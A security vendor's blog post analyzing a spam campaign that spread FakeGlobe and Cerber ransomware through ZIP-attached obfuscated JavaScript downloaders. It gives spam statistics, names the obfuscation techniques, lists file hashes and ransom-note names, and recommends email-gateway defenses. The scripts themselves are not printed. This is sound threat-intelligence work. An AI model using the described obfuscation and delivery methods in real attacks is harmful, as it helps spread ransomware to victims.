Trustwave Unveils New Offerings to Maximize Value of Microsoft Security Investments. Learn More

Trustwave Unveils New Offerings to Maximize Value of Microsoft Security Investments. Learn More

Managed Detection & Response

Eliminate active threats with 24/7 threat detection, investigation, and response.

Co-Managed SOC (SIEM)

Maximize your SIEM investment, stop alert fatigue, and enhance your team with hybrid security operations support.

Advisory & Diagnostics

Advance your cybersecurity program and get expert guidance where you need it most.

Penetration Testing

Test your physical locations and IT infrastructure to shore up weaknesses before exploitation.

Database Security

Prevent unauthorized access and exceed compliance requirements.

Email Security

Stop email threats others miss and secure your organization against the #1 ransomware attack vector.

Digital Forensics & Incident Response

Prepare for the inevitable with 24/7 global breach response in-region and available on-site.

Firewall & Technology Management

Mitigate risk of a cyberattack with 24/7 incident and health monitoring and the latest threat intelligence.

Offensive Security
Solutions to maximize your security ROI
Microsoft Exchange Server Attacks
Stay protected against emerging threats
Rapidly Secure New Environments
Security for rapid response situations
Securing the Cloud
Safely navigate and stay protected
Securing the IoT Landscape
Test, monitor and secure network objects
Why Trustwave
About Us
Awards and Accolades
Trustwave SpiderLabs Team
Trustwave Fusion Security Operations Platform
Trustwave Security Colony
Technology Alliance Partners
Key alliances who align and support our ecosystem of security offerings
Trustwave PartnerOne Program
Join forces with Trustwave to protect against the most advance cybersecurity threats
SpiderLabs Blog

FakeGlobe and Cerber Ransomware: Sneaking under the radar while WeCry

Recently, we observed a constant influx of spam that distributes two ransomware families, perhaps trying to sneak in while everyone is focused with the recent WannaCry malware. Based on data from our Spam Research Database, an email campaign distributing FakeGlobe ransomware started last May 19th and died down on May 21st . But just a couple hours later it was the Cerber ransomware's turn which subsided three days later.


Figure 1: Volume of FakeGlobe and Cerber related Spam.

The Cerber family started to emerge during the 1st quarter of 2016 and has been seen being distributed via Neutrino or Magnitude exploit kits and spam emails using VBScript files. On the other hand, FakeGlobe ransomware samples were first seen in the last quarter of 2016 via malicious spam and are considered to be closely related to the Globe ransomware families.

This is not a massive campaign, but we did notice almost 31,000 spam emails in our system distributed for both types of malware. While we don't know the botnet origin of these email spams, we can see the majority of the spam originates from Vietnam, India, and Laos. This merely indicates where the compromised computers are located.


Figure 2: FakeGlobe and Cerber Spam Origin.

Infection Vector

The email spam related to FakeGlobe and Cerber comes with a ZIP attachment, a blank Subject and does not include any email body.


Figure 3: Sample Email

For FakeGlobe, the ZIP will extract an obfuscated JS file and there are two variations. As shown in the figure below, the first variation is encoded using MS Script Encoder which uses unique delimiters (#@~^ and ^#~@). There is an available tool to decode this.


Figure 4: MS Encoded Script – FakeGlobe

The second variation uses the eval() and executes both split() and join() functions.


Figure 5: Obfuscated Script – FakeGlobe

A classic way to de-obfuscate the code is to write the output of the eval() function into the document stream by using document.write.


Figure 6: Handling the Obfuscated Script – FakeGlobe

Decoding both of two scripts results in proper JS code which downloads a binary file, uses a random string of digits as a filename and executes it.


Figure 7: Decoded/De-obfuscated Script for FakeGlobe

Download URLs (FakeGlobe):




Hash Details (FakeGlobe):

MD5: 1BBD2DC9746292C60121865663B287F2

SHA-1: 04644335EF7523274146A4F39AB30621C2A2A9A1

SHA-256: 2815C8CDB02003298F7959FD1CF6EED893DE6652F3861A6A2E3E5744B8AC9234

For the Cerber variants, the ZIP file only holds an obfuscated JS file and decoding it will download a different binary file.


Figure 8: De-obfuscated Script for Cerber

Download URLs (Ceber):


Hash Details (Ceber):

MD5: AE5A348B9DD0AC3A6A46E70C82FA9C38

SHA-1: F440EDC4FE35452D0FBEC35A5C352295F3E3BF0C

SHA-256: 73A7497C8FA283B444242259AE061D5CBB705BE04B5F531F1096A2C236BB5204

Executable Payload

The binary files of both FakeGlobe and Cerber still maintain the same behavior of their previous variants where they encrypt files, with just a few minor changes on the ransom note file. Cerber uses a different filename for its ransom note, _R_E_A_D___T_H_I_S___{random}.html or _R_E_A_D___T_H_I_S___{random}.txt. It retains the same old contents of the ransom note except for the details of its URL payments.


Figure 9: Cerber's Ransom Note

FakeGlobe still drops how_to_back_files.html but it has changed the details of the email address used to forward the screenshot of the bitcoin payments.



While everyone is riding the WeCry/WannaCry wave and focused on patching vulnerabilities related to SMB server, FakeGlobe and Cerber ransomware continue a low-profile attack via email. Each of these emails has a unique attachment because of the obfuscated JavaScript code. By the time this script downloads the main ransomware, it is too late. Thus, it is desirable to try and block this at the email gateway.

  • Use an email gateway with multiple layers of protection, including anti-spam, and anti-malware layers with up to date signatures
  • At a policy level, consider blocking inbound *.js files at the email gateway – we are currently seeing many malicious email campaigns that use *.js files

The Trustwave Secure Email Gateway recognizes and blocks this threat campaign.

Latest SpiderLabs Blogs

Fare Thee Well ModSecurity: End-of-Life and Last Commercial Rules Update for June 2024

A Fourteen-Year Journey Comes to an End In June 2010, Trustwave acquired Breach Security, which brought with it the popular Open-Source Web Application Firewall ModSecurity for Apache. At that time,...

Read More

Secure Access Service Edge: Another Multi-Tool for the SOC

Over the years, several security defense architectures have merged into a single solution. Endpoint detection tools can perform sophisticated detections and correlations that used to require a...

Read More

Search & Spoof: Abuse of Windows Search to Redirect to Malware

Trustwave SpiderLabs has detected a sophisticated malware campaign that leverages the Windows search functionality embedded in HTML code to deploy malware. We found the threat actors utilizing a...

Read More